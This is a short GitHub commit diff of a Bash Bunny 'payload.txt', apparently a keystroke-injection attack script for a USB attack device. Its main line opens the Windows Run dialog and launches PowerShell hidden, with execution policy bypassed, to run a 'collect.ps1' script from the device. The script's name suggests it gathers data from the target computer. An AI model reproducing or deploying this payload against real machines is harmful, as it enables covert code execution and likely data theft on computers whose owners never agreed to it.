Modify PowerShell command in payload.txt

Updated PowerShell command to reflect device name changes.
This commit is contained in:
GHXSTFPS
2025-11-25 20:21:20 -05:00
committed by GitHub
parent a670f61a85
commit 4fd8257f22

View File

@@ -9,6 +9,6 @@ LED ATTACK
# Open Run dialog
QUACK GUI r
sleep 0.3
# Launch PowerShell hidden and run the script
# Below is the line you will need to change if you have altered your Device Name or if it is something other than BashBunny
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\collect.ps1')"
LED FINISH